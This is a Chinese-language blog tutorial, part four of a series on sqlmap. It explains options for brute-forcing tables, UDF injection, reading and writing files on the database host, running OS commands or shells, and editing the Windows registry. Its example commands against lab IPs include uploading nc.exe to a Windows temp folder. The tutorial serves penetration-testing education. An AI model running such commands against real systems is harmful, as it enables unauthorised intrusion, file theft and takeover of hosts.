sqlmap使用教程 四

101 阅读2分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路。

暴力

这些选项可以被用来运行暴力检查

   --common-tables     检查存在共同表

   --common-columns    检查存在共同列

用户自定义函数注入

这些选项可以用来创建用户自定义函数

   --udf-inject    注入用户自定义函数

   --shared-lib=SHLIB  共享库的本地路径

访问文件系统

这些选项可以被用来访问后端数据库管理系统的底层文件系统

   --file-read=RFILE   从后端的数据库管理系统文件系统读取文件,SQL Server2005中读取二进制文件example.exe:

sqlmap.py -u"http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther"--file-read "C:/example.exe" -v 1

   --file-write=WFILE  编辑后端的数据库管理系统文件系统上的本地文件

   --file-dest=DFILE   后端的数据库管理系统写入文件的绝对路径

在kali中将/software/nc.exe文件上传到C:/WINDOWS/Temp下:

python sqlmap.py -u"http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write"/software/nc.exe" --file-dest "C:/WINDOWS/Temp/nc.exe" -v1

操作系统访问

这些选项可以用于访问后端数据库管理系统的底层操作系统

   --os-cmd=OSCMD   执行操作系统命令(OSCMD)

   --os-shell          交互式的操作系统的shell

   --os-pwn          获取一个OOB shell,meterpreter或VNC

   --os-smbrelay       一键获取一个OOBshell,meterpreter或VNC

   --os-bof           存储过程缓冲区溢出利用

   --priv-esc          数据库进程用户权限提升

   --msf-path=MSFPATH  MetasploitFramework本地的安装路径

   --tmp-path=TMPPATH  远程临时文件目录的绝对路径

linux查看当前用户命令:

sqlmap.py -u"http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v1

Windows注册表访问

这些选项可以被用来访问后端数据库管理系统Windows注册表

   --reg-read          读一个Windows注册表项值

   --reg-add           写一个Windows注册表项值数据

   --reg-del           删除Windows注册表键值

   --reg-key=REGKEY    Windows注册表键

   --reg-value=REGVAL  Windows注册表项值

   --reg-data=REGDATA  Windows注册表键值数据

   --reg-type=REGTYPE  Windows注册表项值类型